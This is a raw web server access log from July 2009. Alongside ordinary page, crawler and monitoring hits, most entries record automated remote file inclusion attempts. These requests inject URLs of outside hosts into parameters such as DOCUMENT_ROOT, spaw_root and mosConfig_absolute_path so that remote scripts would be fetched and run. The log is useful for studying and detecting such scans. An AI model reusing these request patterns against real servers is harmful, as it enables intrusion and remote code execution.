216.117.172.131 - - [01/Jul/2009:00:27:52 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
216.117.172.131 - - [01/Jul/2009:00:27:53 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.117.172.131 - - [01/Jul/2009:00:27:53 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.117.172.131 - - [01/Jul/2009:00:27:53 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
60.251.217.4 - - [01/Jul/2009:00:28:02 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
60.251.217.4 - - [01/Jul/2009:00:28:03 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
60.251.217.4 - - [01/Jul/2009:00:28:07 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.117.172.131 - - [01/Jul/2009:00:28:13 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.117.172.131 - - [01/Jul/2009:00:28:16 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:28:17 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:28:17 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:28:17 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:28:20 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:28:20 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:28:20 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:28:34 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
60.251.217.4 - - [01/Jul/2009:00:28:35 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
60.251.217.4 - - [01/Jul/2009:00:28:35 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:28:39 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
60.251.217.4 - - [01/Jul/2009:00:28:40 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.117.172.131 - - [01/Jul/2009:00:28:52 -0400] "GET /logs/access_log.Q109050800%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.117.172.131 - - [01/Jul/2009:00:28:57 -0400] "GET /logs/access_log.Q109050800%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
60.251.217.4 - - [01/Jul/2009:00:28:59 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.117.172.131 - - [01/Jul/2009:00:29:01 -0400] "GET /logs/access_log.Q109051300%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:00:29:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.117.172.131 - - [01/Jul/2009:00:29:02 -0400] "GET /logs/access_log.Q109051300%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
60.251.217.4 - - [01/Jul/2009:00:29:42 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.145.1 - - [01/Jul/2009:00:29:44 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
124.0.145.1 - - [01/Jul/2009:00:29:44 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.145.1 - - [01/Jul/2009:00:29:44 -0400] "GET /logs/access_log.Q109061600%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:00:30:06 -0400] "GET /logs/access_log.Q109060600%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:00:30:17 -0400] "GET /logs/access_log.Q109060600%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:00:30:22 -0400] "GET /logs/access_log.Q109051300%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:00:30:51 -0400] "GET /logs/access_log.Q109051300%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:31:03 -0400] "GET /logs/error_log.Q109041400%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:31:11 -0400] "GET /logs/error_log.Q109041400%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:31:35 -0400] "GET /logs/access_log.Q109060600%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.238.52.141 - - [01/Jul/2009:00:31:37 -0400] "GET /logs/access_log.Q109060600%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.138.156.3 - - [01/Jul/2009:00:31:56 -0400] "GET /logs/access_log.Q109061600//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:00:31:56 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:00:31:56 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:00:31:56 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
124.138.156.3 - - [01/Jul/2009:00:32:00 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.138.156.3 - - [01/Jul/2009:00:32:00 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
124.0.145.1 - - [01/Jul/2009:00:32:09 -0400] "GET /logs/error_log.Q109061600%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:00:32:31 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.146.231.194 - - [01/Jul/2009:00:32:35 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.146.231.194 - - [01/Jul/2009:00:32:35 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.146.231.194 - - [01/Jul/2009:00:32:35 -0400] "GET /logs/access_log.Q109061600//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:00:32:40 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:00:32:40 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 200 7716 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:00:32:40 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.249.71.204 - - [01/Jul/2009:00:32:57 -0400] "GET /logs/access_log.Q107072000 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.207.160.102 - - [01/Jul/2009:00:33:16 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.138.156.3 - - [01/Jul/2009:00:33:21 -0400] "GET /logs/error_log.Q109061600//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.146.231.194 - - [01/Jul/2009:00:33:49 -0400] "GET /logs/error_log.Q109061600//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
60.251.217.4 - - [01/Jul/2009:00:33:59 -0400] "GET /logs/access_log.Q109060600%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
60.251.217.4 - - [01/Jul/2009:00:33:59 -0400] "GET /logs/access_log.Q109060600%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:00:34:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
60.251.217.4 - - [01/Jul/2009:00:36:14 -0400] "GET /logs/error_log.Q109050800%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
192.138.74.36 - - [01/Jul/2009:00:36:45 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
192.138.74.36 - - [01/Jul/2009:00:36:45 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
192.138.74.36 - - [01/Jul/2009:00:36:46 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
60.251.217.4 - - [01/Jul/2009:00:36:51 -0400] "GET /logs/error_log.Q109050800%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
192.138.74.36 - - [01/Jul/2009:00:36:55 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
192.138.74.36 - - [01/Jul/2009:00:36:59 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
192.138.74.36 - - [01/Jul/2009:00:37:00 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
192.138.74.36 - - [01/Jul/2009:00:37:05 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
67.49.70.239 - - [01/Jul/2009:00:37:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.49.70.239 - - [01/Jul/2009:00:37:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.49.70.239 - - [01/Jul/2009:00:37:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
67.49.70.239 - - [01/Jul/2009:00:37:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
195.207.160.102 - - [01/Jul/2009:00:37:43 -0400] "GET /logs/error_log.Q109041400%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:00:37:43 -0400] "GET /logs/error_log.Q109050800%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:37:55 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:37:55 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:37:55 -0400] "GET /logs/access_log.Q109051400%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:37:57 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:37:57 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:37:57 -0400] "GET /logs/access_log.Q109051400%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
71.129.55.243 - - [01/Jul/2009:00:37:57 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
71.129.55.243 - - [01/Jul/2009:00:37:57 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
195.34.78.110 - - [01/Jul/2009:00:37:58 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:37:58 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:37:58 -0400] "GET /logs/access_log.Q109051400%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
71.129.55.243 - - [01/Jul/2009:00:37:58 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
71.129.55.243 - - [01/Jul/2009:00:37:58 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
195.34.78.110 - - [01/Jul/2009:00:37:58 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:37:58 -0400] "GET /logs/access_log.Q109051400%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:37:58 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:38:42 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:38:51 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:38:54 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:38:54 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:00:39:02 -0400] "GET /logs/error_log.Q109041400%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:00:39:02 -0400] "GET /logs/error_log.Q109050800%20%20/?DOCUMENT_ROOT=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:00:39:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.125.38.117 - - [01/Jul/2009:00:39:20 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.125.38.117 - - [01/Jul/2009:00:39:20 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.125.38.117 - - [01/Jul/2009:00:39:20 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.125.38.117 - - [01/Jul/2009:00:39:31 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:39:32 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:39:36 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:39:36 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:39:36 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:40:05 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:40:07 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:40:09 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
217.65.6.12 - - [01/Jul/2009:00:40:10 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
217.65.6.12 - - [01/Jul/2009:00:40:11 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
217.65.6.12 - - [01/Jul/2009:00:40:11 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
217.65.6.12 - - [01/Jul/2009:00:40:11 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.808"
195.34.78.110 - - [01/Jul/2009:00:40:18 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:40:26 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:40:27 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
124.0.145.1 - - [01/Jul/2009:00:40:36 -0400] "GET /logs/error_log.Q109061600//admin/spaw/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:40:41 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:40:54 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
38.99.13.118 - - [01/Jul/2009:00:41:05 -0400] "GET /logs/access_log.Q108082100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.71.16 - - [01/Jul/2009:00:41:20 -0400] "GET /images/items/2952560_full.jpg HTTP/1.1" 200 8655 "-" "Googlebot-Image/1.0"
195.34.78.110 - - [01/Jul/2009:00:41:49 -0400] "GET /logs/access_log.Q109051400/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
217.125.38.117 - - [01/Jul/2009:00:42:19 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.125.38.117 - - [01/Jul/2009:00:43:07 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.71.204 - - [01/Jul/2009:00:43:34 -0400] "GET /logs/access_log.Q107112600 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.34.78.110 - - [01/Jul/2009:00:43:43 -0400] "GET /logs/access_log.Q109051400/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
195.34.78.110 - - [01/Jul/2009:00:43:48 -0400] "GET /logs/access_log.Q109051400/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
38.99.13.118 - - [01/Jul/2009:00:43:58 -0400] "GET /logs/error_log.Q108081700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [01/Jul/2009:00:44:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
